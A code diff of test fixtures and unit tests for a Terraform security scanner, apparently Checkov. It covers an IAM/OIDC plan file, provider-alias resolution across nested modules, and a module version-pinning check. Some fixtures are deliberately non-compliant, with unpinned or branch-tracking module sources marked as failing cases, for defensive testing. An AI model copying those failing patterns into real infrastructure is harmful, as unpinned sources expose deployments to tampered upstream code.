+        "after_unknown": {
+          "arn": true,
+          "assume_role_policy": true,
+          "create_date": true,
+          "id": true,
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": true,
+          "name_prefix": true,
+          "tags_all": {},
+          "unique_id": true
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": [],
+          "tags_all": {}
+        }
+      }
+    },
+    {
+      "address": "module.poc.aws_iam_role.r1[\"p1\"]",
+      "module_address": "module.poc",
+      "mode": "managed",
+      "type": "aws_iam_role",
+      "name": "r1",
+      "index": "p1",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "description": null,
+          "force_detach_policies": true,
+          "inline_policy": [
+            {
+              "name": "eks_s3_access",
+              "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+            }
+          ],
+          "max_session_duration": 3600,
+          "name": "r7",
+          "path": "/",
+          "permissions_boundary": null,
+          "tags": null,
+          "tags_all": {
+            "checkov_uid": "CKV_AWS_358",
+            "environment": "test",
+            "managed_by": "terraform"
+          }
+        },
+        "after_unknown": {
+          "arn": true,
+          "assume_role_policy": true,
+          "create_date": true,
+          "id": true,
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": true,
+          "name_prefix": true,
+          "tags_all": {},
+          "unique_id": true
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": [],
+          "tags_all": {}
+        }
+      }
+    },
+    {
+      "address": "module.poc.aws_iam_role.r1[\"p2\"]",
+      "module_address": "module.poc",
+      "mode": "managed",
+      "type": "aws_iam_role",
+      "name": "r1",
+      "index": "p2",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "description": null,
+          "force_detach_policies": true,
+          "inline_policy": [
+            {
+              "name": "eks_s3_access",
+              "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+            }
+          ],
+          "max_session_duration": 3600,
+          "name": "r2",
+          "path": "/",
+          "permissions_boundary": null,
+          "tags": null,
+          "tags_all": {
+            "checkov_uid": "CKV_AWS_358",
+            "environment": "test",
+            "managed_by": "terraform"
+          }
+        },
+        "after_unknown": {
+          "arn": true,
+          "assume_role_policy": true,
+          "create_date": true,
+          "id": true,
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": true,
+          "name_prefix": true,
+          "tags_all": {},
+          "unique_id": true
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": [],
+          "tags_all": {}
+        }
+      }
+    }
+  ],
+  "configuration": {
+    "provider_config": {
+      "aws": {
+        "name": "aws",
+        "full_name": "registry.terraform.io/hashicorp/aws",
+        "expressions": {
+          "default_tags": [
+            {
+              "tags": {
+                "constant_value": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                }
+              }
+            }
+          ],
+          "region": {
+            "constant_value": "eu-central-1"
+          }
+        }
+      }
+    },
+    "root_module": {
+      "module_calls": {
+        "poc": {
+          "source": "./module",
+          "module": {
+            "resources": [
+              {
+                "address": "aws_iam_openid_connect_provider.r5",
+                "mode": "managed",
+                "type": "aws_iam_openid_connect_provider",
+                "name": "r5",
+                "provider_config_key": "aws",
+                "expressions": {
+                  "client_id_list": {
+                    "constant_value": [
+                      "sts.amazonaws.com"
+                    ]
+                  },
+                  "thumbprint_list": {
+                    "constant_value": [
+                      "cf23df2207d99a74fbe169e3eba035e633b65d94"
+                    ]
+                  },
+                  "url": {
+                    "constant_value": "https://accounts.google.com"
+                  }
+                },
+                "schema_version": 0
+              },
+              {
+                "address": "aws_iam_role.r6",
+                "mode": "managed",
+                "type": "aws_iam_role",
+                "name": "r6",
+                "provider_config_key": "aws",
+                "expressions": {
+                  "assume_role_policy": {
+                    "references": [
+                      "data.aws_iam_policy_document.r4",
+                      "each.key"
+                    ]
+                  },
+                  "force_detach_policies": {
+                    "constant_value": true
+                  },
+                  "inline_policy": [
+                    {
+                      "name": {
+                        "constant_value": "eks_s3_access"
+                      },
+                      "policy": {
+                        "references": [
+                          "each.value"
+                        ]
+                      }
+                    }
+                  ],
+                  "name": {
+                    "references": [
+                      "each.value"
+                    ]
+                  }
+                },
+                "schema_version": 0,
+                "for_each_expression": {
+                  "references": [
+                    "var.app_k8s_namespace"
+                  ]
+                }
+              },
+              {
+                "address": "aws_iam_role.r1",
+                "mode": "managed",
+                "type": "aws_iam_role",
+                "name": "r1",
+                "provider_config_key": "aws",
+                "expressions": {
+                  "assume_role_policy": {
+                    "references": [
+                      "data.aws_iam_policy_document.r3",
+                      "each.key"
+                    ]
+                  },
+                  "force_detach_policies": {
+                    "constant_value": true
+                  },
+                  "inline_policy": [
+                    {
+                      "name": {
+                        "constant_value": "eks_s3_access"
+                      },
+                      "policy": {
+                        "references": [
+                          "each.value"
+                        ]
+                      }
+                    }
+                  ],
+                  "name": {
+                    "references": [
+                      "each.value"
+                    ]
+                  }
+                },
+                "schema_version": 0,
+                "for_each_expression": {
+                  "references": [
+                    "var.app_k8s_namespace"
+                  ]
+                }
+              },
+              {
+                "address": "data.aws_iam_policy_document.r4",
+                "mode": "data",
+                "type": "aws_iam_policy_document",
+                "name": "r4",
+                "provider_config_key": "aws",
+                "expressions": {
+                  "statement": [
+                    {
+                      "actions": {
+                        "constant_value": [
+                          "sts:AssumeRoleWithWebIdentity"
+                        ]
+                      },
+                      "condition": [
+                        {
+                          "test": {
+                            "constant_value": "StringEquals"
+                          },
+                          "values": {
+                            "references": [
+                              "each.value"
+                            ]
+                          },
+                          "variable": {
+                            "references": [
+                              "aws_iam_openid_connect_provider.r5.url",
+                              "aws_iam_openid_connect_provider.r5"
+                            ]
+                          }
+                        },
+                        {
+                          "test": {
+                            "constant_value": "StringEquals"
+                          },
+                          "values": {
+                            "constant_value": [
+                              "sts.amazonaws.com"
+                            ]
+                          },
+                          "variable": {
+                            "references": [
+                              "aws_iam_openid_connect_provider.r5.url",
+                              "aws_iam_openid_connect_provider.r5"
+                            ]
+                          }
+                        }
+                      ],
+                      "effect": {
+                        "constant_value": "Allow"
+                      },
+                      "principals": [
+                        {
+                          "identifiers": {
+                            "constant_value": [
+                              "cognito-identity.amazonaws.com"
+                            ]
+                          },
+                          "type": {
+                            "constant_value": "Federated"
+                          }
+                        }
+                      ]
+                    }
+                  ]
+                },
+                "schema_version": 0,
+                "for_each_expression": {
+                  "references": [
+                    "var.app_k8s_namespace"
+                  ]
+                }
+              },
+              {
+                "address": "data.aws_iam_policy_document.r3",
+                "mode": "data",
+                "type": "aws_iam_policy_document",
+                "name": "r3",
+                "provider_config_key": "aws",
+                "expressions": {
+                  "statement": [
+                    {
+                      "actions": {
+                        "constant_value": [
+                          "sts:AssumeRoleWithWebIdentity"
+                        ]
+                      },
+                      "condition": [
+                        {
+                          "test": {
+                            "constant_value": "StringEquals"
+                          },
+                          "values": {
+                            "references": [
+                              "each.value"
+                            ]
+                          },
+                          "variable": {
+                            "references": [
+                              "aws_iam_openid_connect_provider.r5.url",
+                              "aws_iam_openid_connect_provider.r5"
+                            ]
+                          }
+                        },
+                        {
+                          "test": {
+                            "constant_value": "StringEquals"
+                          },
+                          "values": {
+                            "constant_value": [
+                              "sts.amazonaws.com"
+                            ]
+                          },
+                          "variable": {
+                            "references": [
+                              "aws_iam_openid_connect_provider.r5.url",
+                              "aws_iam_openid_connect_provider.r5"
+                            ]
+                          }
+                        }
+                      ],
+                      "effect": {
+                        "constant_value": "Allow"
+                      },
+                      "principals": [
+                        {
+                          "identifiers": {
+                            "references": [
+                              "aws_iam_openid_connect_provider.r5.arn",
+                              "aws_iam_openid_connect_provider.r5"
+                            ]
+                          },
+                          "type": {
+                            "constant_value": "Federated"
+                          }
+                        }
+                      ]
+                    }
+                  ]
+                },
+                "schema_version": 0,
+                "for_each_expression": {
+                  "references": [
+                    "var.app_k8s_namespace"
+                  ]
+                }
+              }
+            ],
+            "variables": {
+              "app_k8s_namespace": {
+                "default": [
+                  "p2",
+                  "p1"
+                ]
+              }
+            }
+          }
+        }
+      }
+    }
+  },
+  "relevant_attributes": [
+    {
+      "resource": "module.poc.aws_iam_openid_connect_provider.r5",
+      "attribute": [
+        "url"
+      ]
+    },
+    {
+      "resource": "module.poc.aws_iam_openid_connect_provider.r5",
+      "attribute": [
+        "arn"
+      ]
+    },
+    {
+      "resource": "module.poc.data.aws_iam_policy_document.r4",
+      "attribute": []
+    },
+    {
+      "resource": "module.poc.data.aws_iam_policy_document.r3",
+      "attribute": []
+    }
+  ],
+  "timestamp": "123"
+}
diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
new file mode 100644
index 00000000000..c8e43ad69cf
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
@@ -0,0 +1,15 @@
+provider "aws" {
+  region = "us-west-1"
+}
+provider "aws" {
+  alias  = "usw2"
+  region = "us-west-2"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+  source    = "./example"
+  providers = {
+    aws = aws.usw2
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
new file mode 100644
index 00000000000..ddf9c45c4e8
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
@@ -0,0 +1,8 @@
+provider "aws" {
+  region = "us-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+  source    = "./example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf
new file mode 100644
index 00000000000..002a92686d3
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf
@@ -0,0 +1,24 @@
+provider "aws" {
+  region = "us-west-1"
+  skip_credentials_validation = true
+  skip_requesting_account_id  = true
+  skip_metadata_api_check     = true
+#  s3_force_path_style         = true
+  access_key                  = "mock_access_key"
+  secret_key                  = "mock_secret_key"
+}
+
+module "level1" {
+  source   = "./nesting"
+  }
+
+
+module "level1_2" {
+  source   = "./nesting_2"
+  }
+
+
+resource "aws_s3_bucket_object" "this_file_2" {
+  bucket   = "your_bucket_name"
+  key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf
new file mode 100644
index 00000000000..444b2c0b0f3
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf
@@ -0,0 +1,41 @@
+provider "aws" {
+  region = "us-west-1"
+  skip_credentials_validation = true
+  skip_requesting_account_id  = true
+  skip_metadata_api_check     = true
+#  s3_force_path_style         = true
+  access_key                  = "mock_access_key"
+  secret_key                  = "mock_secret_key"
+}
+
+provider "aws" {
+  region = "eu-west-1"
+  alias = "eu_west"
+  skip_credentials_validation = true
+  skip_requesting_account_id  = true
+  skip_metadata_api_check     = true
+#  s3_force_path_style         = true
+  access_key                  = "mock_access_key"
+  secret_key                  = "mock_secret_key"
+}
+
+module "level2" {
+  source   = "./nesting_l2"
+}
+
+module "level2_2" {
+  source   = "./nesting_l2_2"
+  providers = {
+    aws =  aws.eu_west
+  }
+}
+
+
+
+
+resource "aws_s3_bucket_object" "this_other_file" {
+  bucket   = "your_bucket_name"
+  key      = "key"
+  source   = "source"
+
+}
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+  bucket   = "your_bucket_name"
+  key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+  bucket   = "your_bucket_name"
+  key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+  bucket   = "your_bucket_name"
+  key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md
new file mode 100644
index 00000000000..c145246bc89
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md
@@ -0,0 +1,27 @@
+Resources by Address:
+
+File: /main.tf:21-24
+- aws_s3_bucket_object.this_file_2
+  - Expected `__provider_address__` == "aws.default"
+  - Result: aws.default
+
+File: /nesting/main.tf:36-41
+- module.level1.aws_s3_bucket_object.this_other_file
+  - Expected `__provider_address__` == "module.level1.aws.default"
+  - Result: aws.default
+
+
+File: /nesting/nesting_l2/main.tf:2-5
+- module.level1.module.level2.aws_s3_bucket_object.this_file_2
+  - Expected: `__provider_address__` == "module.level1.aws.default"
+  - Result: __provider_address__ does not exist
+
+File: /nesting/nesting_l2_2/main.tf:2-5
+- module.level1.module.level2_2.aws_s3_bucket_object.this_file_2
+  - Expected: `__provider_address__` == "module.level1.aws.eu_west"
+  - Result: aws.eu_west
+
+File: /nesting_2/main.tf:2-5
+- module.level1_2.aws_s3_bucket_object.this_file_2
+  - Expected: `__provider_address__` == "aws.default"
+  - Result: aws.default
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf
new file mode 100644
index 00000000000..a701ffbe4f6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf
@@ -0,0 +1,12 @@
+provider "abbey" {
+}
+
+provider "aws" {
+ region = ""
+ alias = "aaa"
+}
+
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+ provider = "aws.aaa"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf
new file mode 100644
index 00000000000..d62ddb0b0e1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf
@@ -0,0 +1,3 @@
+module "example2" {
+  source    = "./example2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf
new file mode 100644
index 00000000000..ddf9c45c4e8
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf
@@ -0,0 +1,8 @@
+provider "aws" {
+  region = "us-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+  source    = "./example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf
new file mode 100644
index 00000000000..d62ddb0b0e1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf
@@ -0,0 +1,3 @@
+module "example2" {
+  source    = "./example2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf
new file mode 100644
index 00000000000..88ee09cea82
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf
@@ -0,0 +1,16 @@
+provider "aws" {
+  region = "us-west-1"
+}
+
+provider "aws" {
+  region = "eu-west-1"
+  alias = "eu-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+  source    = "./example"
+  providers = {
+    aws = aws.eu-west-1
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_without_module/main.tf b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf
new file mode 100644
index 00000000000..e63ccd104d1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf
@@ -0,0 +1,17 @@
+provider "aws" {
+  region = "usw2"
+}
+
+provider "aws" {
+  alias = "usw1"
+  region = ""
+}
+
+resource "aws_s3_bucket" "bucket"{
+  bucket = "bucket"
+  provider = aws.usw1
+}
+
+resource "aws_s3_bucket" "bucket_2" {
+  bucket = "bucket-2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py b/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
index aa26d542671..0eaff40f31c 100644
--- a/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
+++ b/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
@@ -1,9 +1,11 @@
+import os
 import unittest
 from pathlib import Path
 
 from checkov.runner_filter import RunnerFilter
 from checkov.terraform.checks.data.aws.GithubActionsOIDCTrustPolicy import check
 from checkov.terraform.runner import Runner
+from checkov.terraform.plan_runner import Runner as PlanRunner
 
 
 class TestGithubActionsOIDCTrustPolicy(unittest.TestCase):
@@ -35,6 +37,30 @@ def test(self):
         self.assertEqual(passing_resources, passed_check_resources)
         self.assertEqual(failing_resources, failed_check_resources)
 
+    def test_terraform_plan(self):
+        runner = PlanRunner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_path = current_dir + "/example_GithubActionsOIDCTrustPolicy/tfplan.json"
+        report = runner.run(files=[test_files_path], runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'module.poc.data.aws_iam_policy_document.r4["p1"]',
+            'module.poc.data.aws_iam_policy_document.r4["p2"]',
+            'module.poc.data.aws_iam_policy_document.r3["p1"]',
+            'module.poc.data.aws_iam_policy_document.r3["p2"]',
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], 0)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+
 
 if __name__ == "__main__":
     unittest.main()
diff --git a/tests/terraform/checks/data/aws/test_ModuleProvider.py b/tests/terraform/checks/data/aws/test_ModuleProvider.py
new file mode 100644
index 00000000000..099672ab004
--- /dev/null
+++ b/tests/terraform/checks/data/aws/test_ModuleProvider.py
@@ -0,0 +1,96 @@
+import unittest
+from pathlib import Path
+
+from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
+from checkov.terraform.tf_parser import TFParser
+
+
+class TestModuleProvider(unittest.TestCase):
+    def test_module_with_two_providers(self):
+        test_files_dir = Path(__file__).parent / "example_ModuleProvider"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        assert len(local_graph.edges) == 2
+        assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].attributes.get('__address__')
+        assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].config['aws'].get('__address__')
+        assert local_graph.edges[0].origin == 1 and local_graph.edges[0].dest == 3
+        assert local_graph.edges[1].origin == 0 and local_graph.edges[1].dest == 3
+
+    def test_module_with_one_def_provider(self):
+        test_files_dir = Path(__file__).parent / "example_module_with_one_provider"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        resource_provider_address = local_graph.vertices[0].attributes.get('__provider_address__')
+        default_provider_address_from_module = local_graph.vertices[2].attributes.get('__address__')
+
+        assert resource_provider_address == default_provider_address_from_module
+
+    def test_resource_with_def_provider(self):
+        test_files_dir = Path(__file__).parent / "example_provider_without_module"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        # assert resource with provider ref.
+        resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__')
+        provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__')
+        assert resource_provider_address_with_alias == provider_address_with_alias
+
+        # assert resource without ref to the default provider
+        resource_provider_address_default = local_graph.vertices[3].attributes.get('__provider_address__')
+        provider_address_default = local_graph.vertices[0].attributes.get('__address__')
+        assert resource_provider_address_default == provider_address_default
+
+    def test_provider_nested_module(self):
+        test_files_dir = Path(__file__).parent / "example_provider_with_nested_module"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        # assert resource with provider ref.
+        resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__')
+        provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__')
+        assert resource_provider_address_with_alias == provider_address_with_alias
+
+    def test_example_provider_with_nested_module_assign_provider(self):
+        test_files_dir = Path(__file__).parent / "example_provider_with_nested_module_assign_provider"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        # assert resource with provider ref.
+        resource_provider_address_with_alias = local_graph.vertices[0].attributes.get('__provider_address__')
+        provider_address_with_alias = local_graph.vertices[4].attributes.get('__address__')
+        assert resource_provider_address_with_alias == provider_address_with_alias
+
+    def test_provider_edge_cases(self):
+        test_files_dir = Path(__file__).parent / "example_provider_edge_case"
+
+        hcl_config_parser = TFParser()
+        module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+        local_graph = TerraformLocalGraph(module)
+        local_graph.build_graph(True)
+
+        assert local_graph.vertices[3].attributes.get('__provider_address__') == "aws.default"
+        assert local_graph.vertices[8].attributes.get('__provider_address__') == "module.level1.aws.default"
+        assert local_graph.vertices[9].attributes.get('__provider_address__') == "module.level1.aws.default"
+        assert local_graph.vertices[10].attributes.get('__provider_address__') == "module.level1.aws.eu_west"
+        assert local_graph.vertices[11].attributes.get('__provider_address__') == "aws.default"
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py b/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
index 63b3a472a1d..6ab2ab610f4 100644
--- a/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
+++ b/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
@@ -7,6 +7,11 @@
 
 
 class TestResourcePolicyDocument(unittest.TestCase):
+    def setUp(self):
+        from checkov.terraform.checks.utils.base_cloudsplaining_iam_scanner import BaseTerraformCloudsplainingIAMScanner
+        # needs to be reset, because the cache belongs to the class not instance
+        BaseTerraformCloudsplainingIAMScanner.policy_document_cache = {}
+
     def test(self):
         test_files_dir = Path(__file__).parent / "example_ResourcePolicyDocument"
 
diff --git a/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf
new file mode 100644
index 00000000000..74862c9a265
--- /dev/null
+++ b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf
@@ -0,0 +1,106 @@
+# pass
+
+module "hash" {
+  source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=26c38a66f12e7c6c93b6a2ba127ad68981a48671"
+
+  name = "my-vpc"
+  cidr = "10.0.0.0/16"
+
+  azs             = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+  private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+  public_subnets  = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+  enable_nat_gateway = true
+  enable_vpn_gateway = true
+
+  tags = {
+    Terraform = "true"
+    Environment = "dev"
+  }
+}
+
+module "sub_dir_hash" {
+  source  = "git::https://github.com/terraform-aws-modules/terraform-aws-cloudwatch.git//modules/log-group?ref=60cf981e0f1ae033699e5b274440867e48289967"
+
+  name              = "git"
+  retention_in_days = 120
+}
+
+module "tag" {
+  source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=v5.0.0"
+
+  name = "my-vpc"
+  cidr = "10.0.0.0/16"
+
+  azs             = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+  private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+  public_subnets  = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+  enable_nat_gateway = true
+  enable_vpn_gateway = true
+
+  tags = {
+    Terraform = "true"
+    Environment = "dev"
+  }
+}
+
+module "shallow_clone" {
+  source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?depth=1&ref=v1.2.0"
+}
+
+module "module_with_version" {
+  source  = "terraform-aws-modules/iam/aws//modules/iam-github-oidc-role"
+  version = "5.39.1"
+}
+
+# fail
+
+module "tf_registry_no_version" {
+  source  = "terraform-aws-modules/cloudwatch/aws//modules/log-group"
+}
+
+module "looks_like_a_branch" {
+  source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=some_branch_name"
+
+  name = "my-vpc"
+  cidr = "10.0.0.0/16"
+
+  azs             = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+  private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+  public_subnets  = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+  enable_nat_gateway = true
+  enable_vpn_gateway = true
+
+  tags = {
+    Terraform = "true"
+    Environment = "dev"
+  }
+}
+
+module "github_module" {
+  source = "github.com/hashicorp/example"
+}
+
+module "bitbucket_module" {
+  source = "bitbucket.org/hashicorp/terraform-consul-aws"
+}
+
+module "github_ssh_module" {
+  source = "git@github.com:hashicorp/example.git"
+}
+
+module "generic_git_module" {
+  source = "git::https://example.com/vpc.git"
+}
+
+# unknown
+
+module "relative" {
+  source = "./example"
+}
+
+module "backtrack" {
+  source = "../example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/module/generic/test_RevisionVersionTag.py b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py
new file mode 100644
index 00000000000..ec9031f9550
--- /dev/null
+++ b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py
@@ -0,0 +1,50 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.module.generic.RevisionVersionTag import check
+from checkov.terraform.runner import Runner
+
+
+class TestRevisionVersionTag(unittest.TestCase):
+    def test(self):
+        # given
